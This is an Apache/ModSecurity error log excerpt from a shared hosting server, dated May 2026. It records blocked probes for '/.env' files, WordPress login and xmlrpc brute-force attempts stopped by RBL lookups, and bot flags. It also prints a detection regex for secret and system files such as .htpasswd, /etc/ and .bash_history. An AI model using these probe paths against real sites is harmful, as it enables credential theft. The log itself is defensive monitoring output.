[Tue May 26 19:42:02.045130 2026] [security2:error] [pid 70836:tid 70976] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWqMe_FvbQ_BhqVMRWUtgAAAI8"]
[Tue May 26 19:42:03.815747 2026] [security2:error] [pid 70836:tid 71029] [client 72.56.145.190:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWqM-_FvbQ_BhqVMRWU6gAAAMQ"], referer: https://www.anujtradingco.com/
[Tue May 26 19:42:04.363402 2026] [security2:error] [pid 70836:tid 71053] [client 57.141.2.35:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWqM-_FvbQ_BhqVMRWU9AAAANw"]
[Tue May 26 19:42:05.046234 2026] [security2:error] [pid 70836:tid 71020] [client 176.65.139.234:46716] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "aastha-enterprises.onesoft.in"] [uri "/.env"] [unique_id "ahWqNe_FvbQ_BhqVMRWVEAAAALs"]
[Tue May 26 19:42:05.768820 2026] [security2:error] [pid 70836:tid 70937] [remote 74.91.224.220:57198] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 220.224.91.74.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "vcresco.com"] [uri "/wp-login.php"] [unique_id "ahWqNe_FvbQ_BhqVMRWVHgAAhmQ"]
[Tue May 26 19:42:05.785360 2026] [security2:error] [pid 70836:tid 71058] [client 176.65.139.235:39216] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "valodico.onesoft.in"] [uri "/.env"] [unique_id "ahWqNe_FvbQ_BhqVMRWVIgAAAOE"]
[Tue May 26 19:42:06.390412 2026] [security2:error] [pid 70836:tid 71033] [client 57.141.2.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWqNe_FvbQ_BhqVMRWVKwAAAMg"]
[Tue May 26 19:42:07.131761 2026] [security2:error] [pid 70836:tid 70977] [client 116.110.42.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWqN-_FvbQ_BhqVMRWVUQAAAJA"], referer: https://www.anujtradingco.com/
[Tue May 26 19:42:07.132219 2026] [security2:error] [pid 70836:tid 71013] [client 116.110.42.5:31003] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/wp-content/plugins/si-contact-form/captcha/securimage_show.php"] [unique_id "ahWqNu_FvbQ_BhqVMRWVSQAAALQ"], referer: https://www.anujtradingco.com/
[Tue May 26 19:42:07.977812 2026] [security2:error] [pid 70836:tid 70976] [client 116.110.42.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWqN-_FvbQ_BhqVMRWVcwAAAI8"], referer: https://www.anujtradingco.com/
[Tue May 26 19:42:07.978289 2026] [security2:error] [pid 70836:tid 70970] [client 116.110.42.5:1230] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/wp-content/plugins/si-contact-form/captcha/securimage_show.php"] [unique_id "ahWqN-_FvbQ_BhqVMRWVcAAAAIk"], referer: https://www.anujtradingco.com/
[Tue May 26 19:42:08.482410 2026] [security2:error] [pid 70836:tid 71069] [client 72.56.145.190:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWqOO_FvbQ_BhqVMRWVfwAAAOw"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1430896&moderation-hash=683babac959ef6b0812e0407a9e1141b
[Tue May 26 19:42:08.935675 2026] [security2:error] [pid 70836:tid 71055] [client 57.141.2.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWqOO_FvbQ_BhqVMRWVggAAAN4"]
[Tue May 26 19:42:09.223140 2026] [security2:error] [pid 70836:tid 71004] [client 65.109.156.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWqOe_FvbQ_BhqVMRWVnQAAAKs"]
[Tue May 26 19:42:09.223205 2026] [security2:error] [pid 70836:tid 71004] [client 65.109.156.37:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWqOe_FvbQ_BhqVMRWVnQAAAKs"]
[Tue May 26 19:42:09.223639 2026] [security2:error] [pid 70836:tid 71021] [client 65.109.156.37:56965] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/features/media-gallery/"] [unique_id "ahWqOe_FvbQ_BhqVMRWVmwAAALw"]
[Tue May 26 19:42:09.399879 2026] [proxy:error] [pid 70836:tid 71081] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:42:09.399928 2026] [proxy_http:error] [pid 70836:tid 71081] [client 87.236.176.48:45029] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:42:09.400659 2026] [proxy:error] [pid 70836:tid 71081] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:42:09.400702 2026] [proxy_http:error] [pid 70836:tid 71081] [client 87.236.176.48:45029] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:42:09.627130 2026] [security2:error] [pid 70836:tid 71069] [client 65.109.156.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWqOe_FvbQ_BhqVMRWVsgAAAOw"]
[Tue May 26 19:42:09.627163 2026] [security2:error] [pid 70836:tid 71069] [client 65.109.156.37:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWqOe_FvbQ_BhqVMRWVsgAAAOw"]
[Tue May 26 19:42:09.627701 2026] [security2:error] [pid 70836:tid 71066] [client 65.109.156.37:57145] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/features/media-gallery/"] [unique_id "ahWqOe_FvbQ_BhqVMRWVsAAAAOk"]
[Tue May 26 19:42:10.305983 2026] [security2:error] [pid 70836:tid 71026] [client 66.249.64.40:52828] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWqOe_FvbQ_BhqVMRWVrgAAAME"], referer: https://mosykay.com/prizes/130698309
[Tue May 26 19:42:11.275214 2026] [security2:error] [pid 70836:tid 70979] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWqOu_FvbQ_BhqVMRWV1AAAAJI"]
[Tue May 26 19:42:11.582558 2026] [security2:error] [pid 70836:tid 71017] [client 144.76.32.237:45736] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 237.32.76.144.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rainadelproperties.com"] [uri "/webhook.php"] [unique_id "ahWqO-_FvbQ_BhqVMRWV4wAAALg"]
[Tue May 26 19:42:12.401403 2026] [proxy:error] [pid 70836:tid 70967] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:42:12.401447 2026] [proxy_http:error] [pid 70836:tid 70967] [client 198.235.24.6:60958] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:42:12.402005 2026] [proxy:error] [pid 70836:tid 70967] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:42:12.402035 2026] [proxy_http:error] [pid 70836:tid 70967] [client 198.235.24.6:60958] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:42:12.710838 2026] [security2:error] [pid 70836:tid 70983] [client 46.8.156.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWqPO_FvbQ_BhqVMRWWHQAAAJY"], referer: https://www.anujtradingco.com/
[Tue May 26 19:42:12.921761 2026] [security2:error] [pid 70836:tid 70992] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWqPO_FvbQ_BhqVMRWWDwAAAJ8"]
[Tue May 26 19:42:13.782193 2026] [security2:error] [pid 70836:tid 71012] [client 46.8.156.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWqPe_FvbQ_BhqVMRWWOAAAALM"], referer: https://www.anujtradingco.com/blog-2/blog-boxed-bigtext/?unapproved=1419340&moderation-hash=287ef5a5b587e0bcda25b21c7fe7df96
[Tue May 26 19:42:14.045467 2026] [security2:error] [pid 70836:tid 70944] [remote 141.98.11.117:44660] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 117.11.98.141.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWqPe_FvbQ_BhqVMRWWPAAAm2s"]
[Tue May 26 19:42:14.163818 2026] [security2:error] [pid 70836:tid 70853] [remote 38.95.35.74:34400] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 74.35.95.38.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "filosha.com"] [uri "/wp-login.php"] [unique_id "ahWqPu_FvbQ_BhqVMRWWSQAA0xA"]
[Tue May 26 19:42:14.791325 2026] [security2:error] [pid 70836:tid 71037] [client 81.162.80.58:53601] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.80.162.81.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "siliconelevators.in"] [uri "/xmlrpc.php"] [unique_id "ahWqPu_FvbQ_BhqVMRWWUQAAAMw"]
[Tue May 26 19:42:14.791475 2026] [security2:error] [pid 70836:tid 71037] [client 81.162.80.58:53601] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "siliconelevators.in"] [uri "/xmlrpc.php"] [unique_id "ahWqPu_FvbQ_BhqVMRWWUQAAAMw"]
[Tue May 26 19:42:15.386580 2026] [security2:error] [pid 70836:tid 71041] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWqPu_FvbQ_BhqVMRWWaQAAANA"]
[Tue May 26 19:42:17.941898 2026] [security2:error] [pid 70836:tid 70867] [remote 208.109.188.137:57310] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 137.188.109.208.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/wp-login.php"] [unique_id "ahWqQe_FvbQ_BhqVMRWWyAAAzx4"]
[Tue May 26 19:42:18.129909 2026] [security2:error] [pid 70836:tid 70970] [client 57.141.2.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWqQe_FvbQ_BhqVMRWWxwAAAIk"]
[Tue May 26 19:42:18.196618 2026] [security2:error] [pid 70836:tid 70920] [remote 208.109.188.137:57310] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 137.188.109.208.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/wp-login.php"] [unique_id "ahWqQu_FvbQ_BhqVMRWW2gAAv1M"], referer: https://obinnawrites.com/wp-login.php
[Tue May 26 19:42:18.309207 2026] [security2:error] [pid 70836:tid 70857] [remote 141.98.11.117:44660] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 117.11.98.141.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWqQu_FvbQ_BhqVMRWW2wAAihQ"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:42:20.544008 2026] [security2:error] [pid 70836:tid 71021] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWqRO_FvbQ_BhqVMRWXKgAAALw"]
[Tue May 26 19:42:21.529265 2026] [security2:error] [pid 70836:tid 71076] [client 176.65.139.234:25508] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "oscpl.com.onesoft.in"] [uri "/.env"] [unique_id "ahWqRe_FvbQ_BhqVMRWXSQAAAPM"]
[Tue May 26 19:42:22.591074 2026] [security2:error] [pid 70836:tid 70949] [remote 194.213.4.139:60984] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 139.4.213.194.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "taotechservices.com"] [uri "/wp-login.php"] [unique_id "ahWqRu_FvbQ_BhqVMRWXYwAAn3A"]
[Tue May 26 19:42:22.900914 2026] [security2:error] [pid 70836:tid 71030] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWqRu_FvbQ_BhqVMRWXZgAAAMU"]
[Tue May 26 19:42:23.816899 2026] [autoindex:error] [pid 70836:tid 71056] [client 43.130.71.237:52804] AH01276: Cannot serve directory /home2/abili6ui/public_html/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 19:42:24.445572 2026] [security2:error] [pid 70836:tid 70843] [remote 194.213.4.139:60984] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 139.4.213.194.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "taotechservices.com"] [uri "/wp-login.php"] [unique_id "ahWqSO_FvbQ_BhqVMRWXowAA3QY"], referer: https://taotechservices.com/wp-login.php
[Tue May 26 19:42:25.426712 2026] [security2:error] [pid 70836:tid 71007] [client 57.141.2.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWqSe_FvbQ_BhqVMRWXswAAAK4"]
[Tue May 26 19:42:26.312476 2026] [security2:error] [pid 70836:tid 70984] [client 45.157.112.248:30563] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 248.112.157.45.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahWqSu_FvbQ_BhqVMRWXzgAAAJc"]
[Tue May 26 19:42:27.118510 2026] [security2:error] [pid 70836:tid 71021] [client 57.141.2.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWqSu_FvbQ_BhqVMRWX4QAAALw"]
[Tue May 26 19:42:27.945931 2026] [core:error] [pid 70836:tid 71085] [client 74.7.228.63:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 19:42:27.945954 2026] [core:error] [pid 70836:tid 71085] [client 74.7.228.63:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 19:42:27.946090 2026] [security2:error] [pid 70836:tid 71085] [client 74.7.228.63:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "500"] [hostname "www.training.mosykay.com"] [uri "/index.php"] [unique_id "ahWqS-_FvbQ_BhqVMRWYBgAAAPw"]
[Tue May 26 19:42:27.946804 2026] [security2:error] [pid 70836:tid 71012] [client 74.7.228.63:43982] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "500"] [hostname "www.training.mosykay.com"] [uri "/robots.txt"] [unique_id "ahWqS-_FvbQ_BhqVMRWYAgAAsyI"]
[Tue May 26 19:42:29.947600 2026] [security2:error] [pid 70836:tid 71040] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWqTe_FvbQ_BhqVMRWYKAAAAM8"]
[Tue May 26 19:42:30.091508 2026] [security2:error] [pid 70836:tid 70990] [client 142.161.92.150:55681] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 150.92.161.142.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shardagalaxy.com"] [uri "/xmlrpc.php"] [unique_id "ahWqTe_FvbQ_BhqVMRWYNQAAAJ0"]
[Tue May 26 19:42:30.091672 2026] [security2:error] [pid 70836:tid 70990] [client 142.161.92.150:55681] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shardagalaxy.com"] [uri "/xmlrpc.php"] [unique_id "ahWqTe_FvbQ_BhqVMRWYNQAAAJ0"]
[Tue May 26 19:42:31.631840 2026] [security2:error] [pid 70836:tid 71083] [client 176.65.139.235:38346] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "test.azurmediatec.com"] [uri "/.env"] [unique_id "ahWqT-_FvbQ_BhqVMRWYWQAAAPo"]
[Tue May 26 19:42:32.180187 2026] [security2:error] [pid 70836:tid 70883] [remote 38.95.35.74:34848] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 74.35.95.38.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "filosha.com"] [uri "/wp-login.php"] [unique_id "ahWqUO_FvbQ_BhqVMRWYagAAyC4"], referer: https://filosha.com/wp-login.php
[Tue May 26 19:42:32.238175 2026] [security2:error] [pid 70836:tid 71054] [client 14.165.243.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWqT-_FvbQ_BhqVMRWYYwAAAN0"]
[Tue May 26 19:42:32.701555 2026] [security2:error] [pid 70836:tid 71082] [client 57.141.2.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWqUO_FvbQ_BhqVMRWYcAAAAPk"]
[Tue May 26 19:42:33.799929 2026] [security2:error] [pid 70836:tid 71042] [client 193.46.199.110:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "cagmedya.com"] [uri "/index.php"] [unique_id "ahWqUe_FvbQ_BhqVMRWYkQAAANE"]
[Tue May 26 19:42:33.967843 2026] [security2:error] [pid 70836:tid 71067] [client 57.141.2.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWqUe_FvbQ_BhqVMRWYjgAAAOo"]
[Tue May 26 19:42:36.369097 2026] [security2:error] [pid 70836:tid 71062] [client 57.141.2.51:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWqU-_FvbQ_BhqVMRWY0gAAAOU"]
[Tue May 26 19:42:38.397726 2026] [security2:error] [pid 70836:tid 70934] [remote 103.95.119.103:53802] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.119.95.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "atreegroup.com"] [uri "/wp-login.php"] [unique_id "ahWqVu_FvbQ_BhqVMRWZFQAAw2E"]
[Tue May 26 19:42:38.830231 2026] [security2:error] [pid 70836:tid 70991] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWqVu_FvbQ_BhqVMRWZGAAAAJ4"]
[Tue May 26 19:42:40.667457 2026] [security2:error] [pid 70836:tid 70888] [remote 54.36.102.244:48074] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 244.102.36.54.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWqWO_FvbQ_BhqVMRWZUwAAzDM"]
[Tue May 26 19:42:41.374515 2026] [fcgid:warn] [pid 70836:tid 71013] (70014)End of file found: [client 66.132.186.206:2258] mod_fcgid: can't get data from http client
